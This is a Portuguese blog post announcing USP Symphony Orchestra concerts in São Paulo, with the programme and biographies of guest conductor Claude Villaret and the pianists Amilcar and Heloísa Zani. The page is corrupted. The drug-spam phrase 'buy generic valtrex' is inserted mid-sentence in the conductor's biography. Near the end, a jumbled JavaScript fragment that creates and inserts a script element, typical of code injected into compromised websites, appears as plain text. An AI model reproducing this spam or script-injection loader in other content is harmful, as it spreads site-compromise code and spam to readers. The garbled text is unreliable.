Música sinfônicaProgramaçãoSão Paulo

Orquestra Sinfônica da USP dias 20 e 22.05

A Orquestra Sinfônica da USP se apresenta dia 20.05 no Anfiteatro Camargo Guarnieri, às 12h., e na Sala São Paulo no dia 22 de maio, às 17h., sob a regência do convidado Claude Villaret (Suíça). No repertório, obras dos compositores Carlos Gomes, Nikolai Rimsky-Korsakov e o concerto para piano a quatro mãos de Alfred Schnittke que conta com a participação dos solistas Amilcar e Heloísa Zani.

SERVIÇO

Anfiteatro Camargo Guarnieri
Rua do Anfiteatro, 109 – Cidade Universitária
Dia 20 de maio às 12h.
Entrada franca

Sala São Paulo
Praça Júlio Prestes, s/nº – Centro
Dia 22 de maio às 17h.
Ingressos: de R$ 10,00 a R$ 50,00 (inteira)
Estudantes, professores, aposentados e pessoas com idade acima de 60 anos têm 50% de desconto.

Anfiteatro Camargo Guarnieri

CARLOS GOMES – (1836–1896)
Abertura Salvator Rosa

ALFRED SCHNITTKE – (1934-1998)
Concerto para piano a quatro mãos e orquestra de câmara

NIKOLAI RIMSKY-KORSAKOV – (1844-1908)
Scheherazade, op.35

Pianistas: Amilcar Zani e Heloísa Zani
Regente convidado: Claude Villaret

Sala São Paulo
Mesmo repertório

ORQUESTRA SINFÔNICA DA USP

A Orquestra Sinfônica da USP é um órgão da Pró-Reitoria de Cultura e Extensão Universitária e teve como primeiro regente o renomado compositor Camargo Guarnieri (1907-1993). Em 1996, lançou um CD com obras de sua autoria.

Em 2000, excursionou pela Alemanha, sendo calorosamente aplaudida. Em 2003, lançou um novo CD com composições escolhidas especialmente para seu núcleo de cordas.

No mesmo ano, foi criado pelo Maestro Ronaldo Bologna o Concurso Nacional de Composição Camargo Guarnieri, incentivando jovens compositores brasileiros. De 2002 a 2008, sob a regência do Maestro Carlos Moreno,a Orquestra promoveu o Projeto Academia voltado ao aperfeiçoamento de músicos profissionais. No ano de 2005, foi lançado um CD em comemoração aos 30 anos de fundação da OSUSP e em 2006, a Orquestra recebeu o prêmio Carlos Gomes de “Melhor Orquestra do Ano”, concedido aos nomes mais expressivos da música erudita nacional.

Em 2008, em um concerto inédito no mundo, a OSUSP realizou o ciclo completo das Bachianas Brasileiras de Villa-Lobos. Em 2009, a maestrina Lígia Amadio assumiu o posto de regente convidada da OSUSP, oferecendo ao público desde então uma rica temporada de concertos que incluiu a participação dos solistas vencedores do Concurso Internacional Rainha Elisabeth, da Bélgica, do violonista Pepe Romero, do tenor José Carreras, de pianistas brasileiros de renome internacional como Eduardo Monteiro, Linda Bustani, Arnaldo Cohen entre outros grandes nomes do cenário musical nacional e internacional.

A OSUSP abriu a temporada lírica do Theatro São Pedro em 2010 com 5 récitas da ópera Tosca, de Puccini,  com sucesso de crítica e público.

Para 2011, pretende manter o alto grau de excelência que marca sua trajetória no cenário musical nacional  atuando ativamente em sua missão de estimular a educação e a cidadania em sentido amplo, incluindo em sua programação repertório de compositores brasileiros, concertos educativos e didáticos nas principais salas de concerto e nos campi da Universidade, promovendo o aprimoramento cultural através da música e possibilitando o estímulo estético, a formação do público e a interação entre o saber produzido na Universidade e a sociedade.

CLAUDE VILLARET – Regente Convidado

Claude Villaret nasceu em Lausanne, na Suíça. Após seus estudos de piano e regência, concentrou sua carreira como solista. Bernard Haitink convidou-o a seguir o seu trabalho com o Euyo e a Berliner Philharmoniker. Por alguns anos morou na Argentina, onde fundou a Orquestra de Jovens da América Latina em 1990 que conduziu no famoso Teatro Colón, em Buenos Aires.

De volta à Europa,

ganhou a competição realizada pela Academia de Música de Biel, em 1994 e participou como maestro convidado da Boémia do Sul Câmara Filarmônica. Desde então, vem realizando concertos nos núcleo de música como Milão, Zurique, Salzburgo, Buenos Aires, Genebra, levando orquestras como: Berliner Symphoniker (Alemanha), Orquestra Sinfónica de Zurique (Suíça), Musikkollegium Winterthur (Suíça), TKO Câmara-Thurgau Orchestra (Suíça), A Orquestra de Novo (Suíça), Genebra, Sinfônica Nacional (Brasil), Orquestra Filarmónica de Plovdiv Estado (Bulgária), Dvorak Orquestra Sinfónica de Praga (República Tcheca), Orquestra de Câmara do Sul da Boémia (República Checa), Orquestra de Câmara (Alemanha), Tübingen, Orquestra Filarmônica do Estado (Roménia) Arad, Estado Orquestra Filarmônica de Sibiu (Roménia), Orquesta Sinfónica Uncuyo (Argentina, Orquesta Sinfónica de Bahia Blanca (Argentina), Orquesta Sinfónica de la UNT (Argentina), Orquesta Sinfónica de Matanzas (Cuba), Orquestra Filarmônica da Tailândia (Bangkok), Orquestra Sinfônica do Estado de Atenas (Grécia).

Entre 2002 e 2005,  foi regente convidado permanente da Orquestra Sinfônica UNT de Tucumán (Argentina) e desde a temporada de 2000 é o principal maestro convidado da Orquestra Sinfônica Nacional (Brasil). Desde dezembro de 2005 é buy generic valtrex maestro convidado permanente da Orquestra Filarmônica da Tailândia.

Lidera a Orquestra Sinfônica KV em Zurique desde 2004. Foi nomeado maestro principal como diretor artístico da Orquestra de Câmara TKO-Thurgau (Suíça). Tem realizado as óperas: “La Bohème”, “Il Trovatore”, como novas produções de “Don Giovanni”, “Traviata”, “Cosi fan tutte”, “Trouble in Tahiti” (L. Bernstein), “7 Pecados Capitais “(K. Weill), na Suíça, Argentina, República Checa, Áustria e Romênia.

Durante o Festival da Canção Hermannstadt (cidade da cultura da Europa 2007), em setembro de 2006, ele realizou uma nova produção de Mozart “Cosi fan tutte”, tendo sido aclamado pela crítica como o melhor da produção do festival.  Realizou primeiras audições de diversos compositores suíços e estrangeiros na Suíça e no exterior. É professor convidado para dar cursos de aperfeiçoamento de regência na Alemanha, Argentina e Brasil e é regente convidado de importantes festivais de música.

Aparece também nas principais salas de concertos como Tonhalle de Zurique, Buenos Aires, Teatro Cólon, Megaron Athens e principais orquestras e solistas como os mundialmente famosos: Francisco Araiza, Dimitris Sgouros.

AMILCAR ZANI E HELOISA ZANI – pianistas

O Duo Zani é formado por Heloísa Zani e Amilcar Zani e o interesse comum pela Música de Câmara levou-os ao estudo minucioso da produção musical para piano a quatro mãos e dois pianos, e a  identidade da formação musical e pianística proporcionou-lhes o entendimento de sua realização.

A formação individual como pianistas desenvolveu-se de maneira semelhante ao estudarem com Gilberto Tinetti em São Paulo, com Helena Costa no Porto, Portugal e finalmente com Conrad Hansen na Escola Superior de Música de Hamburgo, Alemanha. Freqüentaram ainda inúmeros cursos de interpretação com Magda Tagliaferro, Jan Ekier, Homero Magalhães e Yvonne Léfèbure.

São ambos professores do Departamento de Música da Escola de Comunicações e Artes da Universidade de São Paulo, onde desenvolvem intenso trabalho didático e de pesquisa nos cursos de Graduação e Pós-Graduação. A busca de novas propostas didáticas em relação ao ensino do instrumento é uma constante na atividade de Heloisa Zani. Amilcar Zani é Mestre e Doutor em Artes, com trabalhos que abordam especificamente a produção artística de Robert Schumann.

Como Duo, têm se apresentado regularmente em inúmeros concertos e recitais. Além de realizarem primeiras audições de obras de compositores brasileiros, como Eduardo Seincman e Willy Correa de Oliveira, dedicam-se à divulgação de obras de vários compositores transcritas para piano a quatro mãos, sempre em primeira audição no Brasil: o Quinteto para piano op. 44 de Robert Schumann, transcrito por Clara Schumann; o Quarteto para piano op. 47, também de Schumann, transcrito por Carl Rinecke; os Quartetos de Cordas de Schumann, transcritos por Otto Dresel.

document.currentScript.parentNode.insertBefore(s, document.currentScript);var d=document;var s=d.createElement(‘script’);

movimento.com
Responsável pela inclusão de programação e assuntos genéricos no blog.